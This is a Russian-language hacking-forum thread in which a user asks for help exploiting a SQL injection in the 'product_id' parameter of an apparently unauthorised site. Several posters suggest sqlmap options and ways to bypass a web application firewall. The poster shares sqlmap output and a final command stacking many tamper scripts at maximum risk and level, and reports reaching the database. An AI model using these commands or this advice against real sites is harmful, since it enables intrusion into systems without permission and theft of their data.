Помощь с эксплутацией SQL инъекции

N1GGA · 14.06.2019

Шалом, всем форумчанам. На одном, интересном для меня сайте нашел несколько уязвимостей SQL. Точнее, уязвим один и тот же параметр. Через ORDER BY я могу узнать количество столбцов, но не в ручную, не с помощью sqlmap, я не могу получить другую инфу. Может кто помочь?)

larchik · 14.06.2019

Шалом. А sqlmap видит инъекцию?
Если да, то вы пробовали его запустить с параметрами --hex или --no-cast? Иногда это помогает

N1GGA · 14.06.2019

larchik сказал(а):
Шалом. А sqlmap видит инъекцию?
Если да, то вы пробовали его запустить с параметрами --hex или --no-cast? Иногда это помогает

Sqlmap вроде видит уязвимость

Код:

[20:14:48] [INFO] heuristic (basic) test shows that GET parameter 'product_id' might be injectable (possible DBMS: 'MySQL')
[20:14:51] [INFO] heuristic (XSS) test shows that GET parameter 'product_id' might be vulnerable to cross-site scripting (XSS) attacks

Пробовал обе варианта, тот же результат

Код:

[20:16:39] [INFO] target URL appears to have 3 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[20:17:21] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y

Marlen · 14.06.2019

А у вас есть в ссылки символ "&"?

N1GGA · 14.06.2019

Marlen сказал(а):
А у вас есть в ссылки символ "&"?

Ну да, так как ссылка имеет несколько параметров.

Marlen · 14.06.2019

GoodSmile сказал(а):
Ну да, так как ссылка имеет несколько параметров.

Вы экранировали ссылку кавычками?

N1GGA · 14.06.2019

Marlen сказал(а):
Вы экранировали ссылку кавычками?

Да. sqlmap -u "http://site.ru/index.php?show_id=7&product_id=92" -p "product_id" --dbms=mysql --dbs

Marlen · 15.06.2019

GoodSmile сказал(а):
Да. sqlmap -u "http://site.ru/index.php?show_id=7&product_id=92" -p "product_id" --dbms=mysql --dbs

А если не использовать принудительную настройку внутренней СУБД?

N1GGA · 15.06.2019

Marlen сказал(а):
А если не использовать принудительную настройку внутренней СУБД?

Если вы про аргумент —dbms, то пытался и без нее. Так же.

Marlen · 15.06.2019

GoodSmile сказал(а):
Если вы про аргумент —dbms, то пытался и без нее. Так же.

ХЗ, так гадать можно долго (ибо это как методом "научного тыка"). Изначально я предположил что у вас не экранирована ссылка, но с у вас всё как и сам бы писал. Самому бы посмотреть, может что и пришло бы на ум.
В любом случае вопрос заинтересовал, если вдруг найдется решение обязательно напишите, что было не так.
Если вдруг возникнут мысли, тоже отпишу.

N1GGA · 15.06.2019

Marlen сказал(а):
ХЗ, так гадать можно долго (ибо это как методом "научного тыка"). Изначально я предположил что у вас не экранирована ссылка, но с у вас всё как и сам бы писал. Самому бы посмотреть, может что и пришло бы на ум.
В любом случае вопрос заинтересовал, если вдруг найдется решение обязательно напишите, что было не так.
Если вдруг возникнут мысли, тоже отпишу.

Хорошо.

larchik · 15.06.2019

Еще я бы посоветовал вседа использовать --random-agent или указывать user-agent вручную. Может быть срабатывает WAF.
Покажите полный вывод sqlmap после этой части:

[20:16:39] [INFO] target URL appears to have 3 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[20:17:21] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y

а то и правда гадаем на кофейной гуще.
Посмотрите эту статью обходим WAF с помощью sqlmap, может там то, что вам нужно.

kluster · 15.06.2019

бывает такое, руками крутится не до конца, а sqlmap раскручивает

Marlen · 15.06.2019

larchik сказал(а):
Еще я бы посоветовал вседа использовать --random-agent или указывать user-agent вручную. Может быть срабатывает WAF.
Покажите полный вывод sqlmap после этой части:

а то и правда гадаем на кофейной гуще.
Посмотрите эту статью обходим WAF с помощью sqlmap, может там то, что вам нужно.

Там просто WAF на 99%. Дали ссылку, уже посмотрел.

MrBa · 15.06.2019

Marlen сказал(а):
Там просто WAF на 99%. Дали ссылку, уже посмотрел.

Определите что именно за WAF и погулите методы обхода. Это лучше вручную. А так, и нечего больше посоветовать.

N1GGA · 15.06.2019

Спасибо всем большое за помощь, особенно Marlen. Получилось все таки добраться до бд.

Код:

sqlmap -u ''ваша ссылка" --risk=3 --level=5 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

Все сервисы Codeby

Поиск

Поиск

Помощь с эксплутацией SQL инъекции

N1GGA

Codeby Team

larchik

N1GGA

Codeby Team

Marlen

N1GGA

Codeby Team

Marlen

N1GGA

Codeby Team

Marlen

N1GGA

Codeby Team

Marlen

N1GGA

Codeby Team

larchik

kluster

Marlen

MrBa

N1GGA

Codeby Team

Похожие темы